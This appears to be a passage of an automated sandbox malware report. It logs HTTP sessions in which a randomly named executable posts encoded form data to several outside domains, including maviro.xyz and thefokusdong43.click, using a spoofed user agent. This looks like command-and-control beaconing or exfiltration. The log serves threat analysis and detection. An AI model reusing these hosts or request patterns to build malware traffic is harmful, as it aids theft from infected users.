                                                                        Data Ascii: J8LHgDJp=uFQiYEVHaVxLkHJqd9OnwZKXwReInOGGuMS/5DJ+bC07PVh9AN+5W81F/IYX4ATAkGLqgqixDlzF+t/GLxXTDewzi/rm2nWaxF2l/l//YStm1uUFn4H6cnnHOngKUlCqTOCosj9xQe4LA9LQ0d2ev+TCwXG8DtTwai4aKlfjHfiyTVzAKR6As1DUBFftNxqYTghh6Qxe0sPo/I4YOLR6FGGAiNzUbcJz3hTMLe870iF0R94sWJmxSeMyTqHfMAoMtDZjJwORxM30Kzw+URwpWy0Sfz22ir23U7C8kcKuK16dGO40GtF6dTQUuabxcXQx8wac1YDQWLieE8Yl5NireG5GdGyGhQeFs6yKeC/EnIkNcO/lQjgXXBFaSF09BOU7Qm10mjVEmIhs+CBhKdQUESrno3MguVlnpEsRdeD05B5/mbywJv503F0WYhoyzfPmC+rX5y9sQSPktKit5yIdAZt+plBUkUX5ZZ3qDtv2hjkBuYUqdIABfJ/etgqv1BuRp4LjecYeah7H9DQ9CIqfyck79do+fXse/ySnTQqeP3DoPF3wku6miLYoxAyPNh+VhAb1ymeEeAsVAgq4T3Zbbt4xtJa6cWsREw+eII0Sja25CVsoVRqp3QNzXTprw+gOiZiXgCITKtFg2zSqklsdgeD6OY6apy+kgoVSSBhQy1MXfVGDAstlPeJSVhhwvEP7/1bXquQAf/ExBfJjgDFb/5PxbXzmXxb6nAz1C1z+/NtCdtybhJHAbtLGnmBnKqGc/CkDzoY6J+PaO2xe+NG7msWi4OVnT+pBFsJhb3sAffhe4gImahyiSxbuAwFN/IS8LecfeuyJB8+nr+lvVEd6Y3IejUDWl87XvRgsGWOkLsUQpVS8dhqkfzS27Y9Yp2zZzyWa1QXH52NkiLUGwHcwd67TTNBJRsYsOsq7C9ajz4mIW06l1Q/MDhrb9Ix19Dsg6P8mALHCBFj5ZbmRo8xJ0N2DASoOQne9xYe6m9xvooy [TRUNCATED]
                                                                        Nov 9, 2024 05:37:25.463197947 CET369INHTTP/1.1 404 Not Found
                                                                        Server: nginx/1.26.1
                                                                        Date: Sat, 09 Nov 2024 04:37:25 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Content-Encoding: gzip
                                                                        Data Raw: 62 31 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 c1 0a c2 30 10 44 ef 82 ff b0 7e 40 1a 23 c5 53 c8 45 14 3c e8 c5 2f 48 dd b5 09 a4 1b 89 11 ec df 9b 6a 0b e2 d9 a3 c7 9d 7d 33 0c a3 5d ee 82 99 cf b4 23 8b 46 67 9f 03 99 7a 59 c3 31 66 d8 c5 3b a3 96 6f 51 cb 17 52 d0 26 62 3f 58 ce c4 99 92 d1 4e 7d 3b 8a a2 e5 f8 1e b2 0b 34 5e dc 7a 7e 48 55 ad d6 95 fa 44 e4 14 2a a7 42 0b 21 c0 c2 d5 22 7a 6e 21 47 40 7f b3 4d 20 38 9c f6 5b b0 8c b0 71 29 76 04 97 e4 89 31 f4 40 29 c5 54 1c 2d 81 10 43 c1 7f c4 2f b7 78 02 1a 70 c3 f4 2b 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: b10D~@#SE</Hj}3]#FgzY1f;oQR&b?XN};4^z~HUD*B!"zn!G@M 8[q)v1@)T-C/xp+0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        28192.168.2.550009167.172.133.32803660C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 9, 2024 05:37:27.351109028 CET491OUTGET /2493/?aF=JLp4o0Qx2F-p4F&J8LHgDJp=jH4Cb08gek16/2FqI6arh4PQxRW9qayf8vOptAV1ciloHQcwXJuEWMhJ8+kmyy6nu0+F87CgCWTPmYOVFW7qHeowlszl5iXL8EHw53KjcBxSho9HkZ7HZn7te055AXvZAw== HTTP/1.1
                                                                        Host: www.winspinoffr.pro
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Nov 9, 2024 05:37:28.015291929 CET705INHTTP/1.1 404 Not Found
                                                                        Server: nginx/1.26.1
                                                                        Date: Sat, 09 Nov 2024 04:37:27 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 555
                                                                        Connection: close
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 [TRUNCATED]
                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        29192.168.2.55001067.223.117.142803660C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 9, 2024 05:37:33.124536037 CET737OUTPOST /hcih/ HTTP/1.1
                                                                        Host: www.maviro.xyz
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 209
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.maviro.xyz
                                                                        Referer: http://www.maviro.xyz/hcih/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Data Raw: 4a 38 4c 48 67 44 4a 70 3d 31 4b 58 55 4b 4f 70 50 54 34 38 2b 77 2f 44 4d 53 53 67 33 56 70 65 42 59 61 61 6e 4a 39 44 66 4c 73 64 4b 47 2f 70 77 30 6b 42 71 66 31 38 61 54 75 33 4f 74 79 70 6d 43 69 69 38 49 42 68 38 45 54 73 73 4d 51 41 43 34 36 4e 6d 78 57 61 73 6a 69 79 66 39 69 31 71 64 53 74 49 64 41 33 5a 6f 64 70 54 4f 68 4f 64 72 6a 64 61 37 6f 45 79 61 38 69 47 7a 67 30 4c 2f 6f 78 45 77 70 58 4a 67 2f 38 7a 66 6f 68 2b 66 36 30 79 45 6d 47 4c 66 62 4b 47 51 65 69 5a 4f 75 6f 70 41 31 55 2f 33 50 79 5a 69 5a 45 50 37 69 51 57 52 54 48 77 44 55 63 35 49 4f 58 42 6b 38 37 68 73 62 65 66 58 50 59 30 54 77 38 3d
                                                                        Data Ascii: J8LHgDJp=1KXUKOpPT48+w/DMSSg3VpeBYaanJ9DfLsdKG/pw0kBqf18aTu3OtypmCii8IBh8ETssMQAC46NmxWasjiyf9i1qdStIdA3ZodpTOhOdrjda7oEya8iGzg0L/oxEwpXJg/8zfoh+f60yEmGLfbKGQeiZOuopA1U/3PyZiZEP7iQWRTHwDUc5IOXBk87hsbefXPY0Tw8=
                                                                        Nov 9, 2024 05:37:33.830866098 CET533INHTTP/1.1 404 Not Found
                                                                        Date: Sat, 09 Nov 2024 04:37:33 GMT
                                                                        Server: Apache
                                                                        Content-Length: 389
                                                                        Connection: close
                                                                        Content-Type: text/html
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        30192.168.2.55001167.223.117.142803660C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 9, 2024 05:37:35.661485910 CET757OUTPOST /hcih/ HTTP/1.1
                                                                        Host: www.maviro.xyz
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 229
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.maviro.xyz
                                                                        Referer: http://www.maviro.xyz/hcih/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Data Raw: 4a 38 4c 48 67 44 4a 70 3d 31 4b 58 55 4b 4f 70 50 54 34 38 2b 78 62 2f 4d 64 53 63 33 54 4a 65 41 64 61 61 6e 41 64 44 62 4c 73 52 4b 47 39 46 47 30 53 52 71 61 68 77 61 53 71 6a 4f 71 79 70 6d 61 79 6a 30 47 68 68 6a 45 54 77 65 4d 53 55 43 34 2b 74 6d 78 57 4b 73 6a 52 72 74 37 79 31 73 47 43 74 4f 41 77 33 5a 6f 64 70 54 4f 67 75 6e 72 6a 6c 61 34 59 30 79 62 64 69 42 79 67 30 49 2b 6f 78 45 30 70 58 4e 67 2f 38 42 66 74 41 70 66 34 4d 79 45 6d 57 4c 66 4b 4b 48 61 65 69 62 41 4f 70 72 42 67 6c 76 2f 50 75 6e 70 36 31 76 73 44 59 79 51 6c 32 61 5a 32 55 52 62 75 37 35 30 76 7a 57 39 72 2f 32 4e 73 49 45 4e 6e 72 34 6d 59 45 7a 71 33 65 38 62 69 33 76 44 35 53 61 77 72 78 71
                                                                        Data Ascii: J8LHgDJp=1KXUKOpPT48+xb/MdSc3TJeAdaanAdDbLsRKG9FG0SRqahwaSqjOqypmayj0GhhjETweMSUC4+tmxWKsjRrt7y1sGCtOAw3ZodpTOgunrjla4Y0ybdiByg0I+oxE0pXNg/8BftApf4MyEmWLfKKHaeibAOprBglv/Punp61vsDYyQl2aZ2URbu750vzW9r/2NsIENnr4mYEzq3e8bi3vD5Sawrxq
                                                                        Nov 9, 2024 05:37:36.365564108 CET533INHTTP/1.1 404 Not Found
                                                                        Date: Sat, 09 Nov 2024 04:37:36 GMT
                                                                        Server: Apache
                                                                        Content-Length: 389
                                                                        Connection: close
                                                                        Content-Type: text/html
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        31192.168.2.55001267.223.117.142803660C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 9, 2024 05:37:38.380681992 CET1774OUTPOST /hcih/ HTTP/1.1
                                                                        Host: www.maviro.xyz
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 1245
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.maviro.xyz
                                                                        Referer: http://www.maviro.xyz/hcih/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Data Raw: 4a 38 4c 48 67 44 4a 70 3d 31 4b 58 55 4b 4f 70 50 54 34 38 2b 78 62 2f 4d 64 53 63 33 54 4a 65 41 64 61 61 6e 41 64 44 62 4c 73 52 4b 47 39 46 47 30 53 5a 71 61 30 73 61 54 49 4c 4f 72 79 70 6d 45 69 6a 33 47 68 67 2f 45 54 34 61 4d 53 59 53 34 34 68 6d 7a 30 79 73 6c 67 72 74 31 79 31 73 50 69 74 50 64 41 33 4d 6f 5a 31 58 4f 68 43 6e 72 6a 6c 61 34 61 73 79 4c 38 69 42 2f 41 30 4c 2f 6f 78 49 77 70 58 6c 67 2f 55 52 66 74 4e 55 66 70 73 79 48 48 6d 4c 59 34 53 48 41 65 69 6a 4e 75 70 4a 42 67 67 31 2f 50 7a 55 70 37 42 4a 73 45 63 79 64 67 72 61 62 47 41 58 48 65 76 59 34 39 33 6e 73 37 2f 6a 4c 4e 55 43 46 47 62 77 6b 4c 73 6c 6a 53 44 2f 56 78 61 62 42 39 61 66 31 38 49 37 76 2b 78 74 55 2b 6b 78 36 38 5a 39 6e 36 2f 55 6c 34 68 50 6a 6f 57 35 76 4d 50 63 35 71 53 78 4d 4b 67 70 61 70 2b 42 66 49 62 68 4b 46 48 54 77 6a 75 39 53 70 76 44 70 49 4f 6e 46 71 4a 68 63 37 59 38 55 48 63 37 61 33 32 72 4c 69 4e 41 75 66 51 67 6a 72 2f 55 2b 45 6b 6a 6d 69 33 42 68 6a 36 59 32 62 72 6f 42 46 4b 4b 4b [TRUNCATED]
                                                                        Data Ascii: J8LHgDJp=1KXUKOpPT48+xb/MdSc3TJeAdaanAdDbLsRKG9FG0SZqa0saTILOrypmEij3Ghg/ET4aMSYS44hmz0yslgrt1y1sPitPdA3MoZ1XOhCnrjla4asyL8iB/A0L/oxIwpXlg/URftNUfpsyHHmLY4SHAeijNupJBgg1/PzUp7BJsEcydgrabGAXHevY493ns7/jLNUCFGbwkLsljSD/VxabB9af18I7v+xtU+kx68Z9n6/Ul4hPjoW5vMPc5qSxMKgpap+BfIbhKFHTwju9SpvDpIOnFqJhc7Y8UHc7a32rLiNAufQgjr/U+Ekjmi3Bhj6Y2broBFKKK/wquy/3lwB67/Piw85Mlg+Y2/Jlcegyvb0ZByCUKcib7VHaWg1tVnHt1tgMlk1MwQ7FGM0ahmrp/Yh3l82JdlBCEVRRQ6AdBqelT3bFjqC0p7+QjmGg8kFzk3RzJJD0aYKiTGJWaifeAUSwVqzD1h8dCys/ELMSHUa8Z1/EXz76k88PJ9h3LbLKvlnvG7CdwEBcEtrGtcnjCcBYOU990nnDUBFZHQ1f++xSxOLcoAXETVB5r1o/sYQLZJW7+8TUVXq/AnFFZLszNRWMc3ha2tvlPvLxtl6PClyIviL80UNXhOK1ZVMIRGrzvziAK54hTm1lRa4Q79tCQuxnFbcdkPjPSaHABIHtrPU+40CWXNTMOqGzXz3a4Vg+XlmLLcgcx2qQ43EW+G7U8EZGP/PfjpT554effCbZ1+i+E9Cvh5hh2gtB8kVgsoH9xs8dhHmTlFZALuJwVK6OonzB4qzK6i7N1CzfHizDgpsdEoVoQna2dqZNGv1KPIGsXS9yMsk6XCgw7X+DW+w4iqYvg7UEWqxXiuZblfQdSutDk0sebsOF5aOsbuUZ3YabfHQY2EMNv1UCF73bF9YPC/HDmuSa0Fv8qTwfj/PQiWSvsAx7g1xcin2XTohL4OKqy5xDpK/wT+Ezj4gikJbwIy4ycvpTdkre29gQGpqYftj [TRUNCATED]
                                                                        Nov 9, 2024 05:37:38.960654020 CET533INHTTP/1.1 404 Not Found
                                                                        Date: Sat, 09 Nov 2024 04:37:38 GMT
                                                                        Server: Apache
                                                                        Content-Length: 389
                                                                        Connection: close
                                                                        Content-Type: text/html
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        32192.168.2.55001367.223.117.142803660C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 9, 2024 05:37:40.945723057 CET486OUTGET /hcih/?J8LHgDJp=4I/0J6YfWYwRno7rH0k2bI6cVdalKpPNFcVIT9hZ02dsPRsaZO23kVRDbCaRJTowDBACcCwGuYsZ/ib1kw640ghKfTJpeVfXv/8QQFzliEtlwJs4R/u7+hsr/ZpE446a8w==&aF=JLp4o0Qx2F-p4F HTTP/1.1
                                                                        Host: www.maviro.xyz
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Nov 9, 2024 05:37:41.648132086 CET548INHTTP/1.1 404 Not Found
                                                                        Date: Sat, 09 Nov 2024 04:37:41 GMT
                                                                        Server: Apache
                                                                        Content-Length: 389
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        33192.168.2.550014172.96.191.232803660C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 9, 2024 05:37:46.790672064 CET767OUTPOST /21bn/ HTTP/1.1
                                                                        Host: www.thefokusdong43.click
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 209
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.thefokusdong43.click
                                                                        Referer: http://www.thefokusdong43.click/21bn/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Data Raw: 4a 38 4c 48 67 44 4a 70 3d 47 57 76 64 6c 68 65 53 2f 70 39 32 6c 49 35 50 7a 4f 79 4d 66 4a 54 72 41 65 5a 71 52 6a 69 41 75 62 52 41 38 38 47 48 72 53 32 79 39 73 41 66 6e 34 59 5a 6d 67 6b 4a 61 4f 51 76 42 65 37 53 35 69 52 43 68 48 36 50 64 6a 69 79 6c 58 36 63 64 32 49 53 54 76 72 67 35 61 55 47 48 57 42 70 6b 45 4b 2b 37 77 4c 68 77 53 6f 4f 31 64 58 76 6b 66 2f 6d 44 48 46 68 6e 31 49 46 56 54 65 4e 6d 70 44 56 35 5a 4b 77 65 7a 77 4d 32 51 57 67 69 6e 4b 38 76 61 37 62 4b 6a 61 30 61 67 32 34 51 4f 70 37 59 4e 6d 4f 42 54 4c 32 49 74 54 79 6a 69 4a 6c 43 73 30 6a 5a 4b 46 76 37 7a 72 56 49 52 62 49 35 5a 38 3d
                                                                        Data Ascii: J8LHgDJp=GWvdlheS/p92lI5PzOyMfJTrAeZqRjiAubRA88GHrS2y9sAfn4YZmgkJaOQvBe7S5iRChH6PdjiylX6cd2ISTvrg5aUGHWBpkEK+7wLhwSoO1dXvkf/mDHFhn1IFVTeNmpDV5ZKwezwM2QWginK8va7bKja0ag24QOp7YNmOBTL2ItTyjiJlCs0jZKFv7zrVIRbI5Z8=
                                                                        Nov 9, 2024 05:37:47.776160955 CET1033INHTTP/1.1 404 Not Found
                                                                        Connection: close
                                                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                        pragma: no-cache
                                                                        content-type: text/html
                                                                        content-length: 796
                                                                        date: Sat, 09 Nov 2024 04:37:47 GMT
                                                                        server: LiteSpeed
